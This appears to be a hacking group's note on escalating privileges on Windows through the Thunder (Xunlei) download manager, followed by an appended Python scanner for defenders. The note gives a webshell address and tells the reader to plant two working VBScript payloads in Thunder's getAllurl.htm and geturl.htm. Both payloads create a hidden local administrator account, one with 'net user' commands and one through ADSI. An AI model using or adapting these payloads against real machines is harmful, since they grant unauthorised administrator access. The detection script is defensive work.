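F4 Technical Group www.f4ms.net
Webshell address
http://192.168.197.130/dama.asp
Thunder (Xunlei) default installation folders
<drive>:\Program Files\Thunder Network\Thunder
<drive>:\Program Files\Thunder
The two files to modify
Go into the Program folder
getAllurl.htm
geturl.htm
Condition: the directory must be writable
Privilege-escalation scripts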
<script language="vbscript">
set vbs=createobject("wscript.shell")
vbs.run "cmd /c net user f4ms f4ms /add",0
vbs.run "cmd /c net localgroup administrators f4ms /add",0
</script>
<script language="vbscript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","f4")
od.SetPassword "f4"
od.SetInfo
Set of=GetObject(os&"/f4",user)
oe.add os&"/f4"
</script>
The upper script is the NET-based privilege escalation.
The lower script is the VBS-based privilege escalation.
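For defenders, the following added example (not part of the original note) checks the two files named above for the script patterns the note shows. The function names, indicator labels and sample inputs are this example's own, and the install folder is passed in by the caller.

```python
import re
from pathlib import Path

# File names taken from the note; it places them in the "Program" subfolder.
TARGET_FILES = ("getAllurl.htm", "geturl.htm")

# One pattern per trait of the two script styles in the note. VBScript is
# case-insensitive, so matching is too. Labels are this example's own.
INDICATORS = {
    "vbscript-block": re.compile(r'<script[^>]*language\s*=\s*"?vbscript', re.I),
    "wscript-shell": re.compile(r'createobject\s*\(\s*"wscript\.shell"', re.I),
    "net-user-add": re.compile(r'net\s+user\s+\S+.*?/add', re.I),
    "net-localgroup-add": re.compile(
        r'net\s+localgroup\s+administrators\s+\S+.*?/add', re.I),
    "adsi-winnt": re.compile(r'winnt://', re.I),
    "adsi-create-user": re.compile(r'\.create\s*\(\s*"user"', re.I),
}

def scan_text(html):
    """Return the sorted labels of every indicator found in one file's text."""
    return sorted(label for label, rx in INDICATORS.items() if rx.search(html))

def scan_install_dir(install_dir):
    """Scan the two .htm files under <install_dir>/Program; map name -> labels."""
    findings = {}
    for name in TARGET_FILES:
        path = Path(install_dir) / "Program" / name
        if path.is_file():
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                findings[name] = hits
    return findings

# Constructed samples (not real Thunder files): one tampered, one benign.
SAMPLE_TAMPERED = '''<html><body>
<script language="vbscript">
set s=createobject("wscript.shell")
s.run "cmd /c net user EXAMPLEUSER EXAMPLEPASS /add",0
s.run "cmd /c net localgroup administrators EXAMPLEUSER /add",0
</script></body></html>'''
SAMPLE_BENIGN = '<html><body><script language="javascript">var a=1;</script></body></html>'

if __name__ == "__main__":
    print(scan_text(SAMPLE_TAMPERED))
    print(scan_text(SAMPLE_BENIGN))
```

Any hit in these files warrants comparing them against a clean copy from the installer and reviewing write permissions on the Program folder.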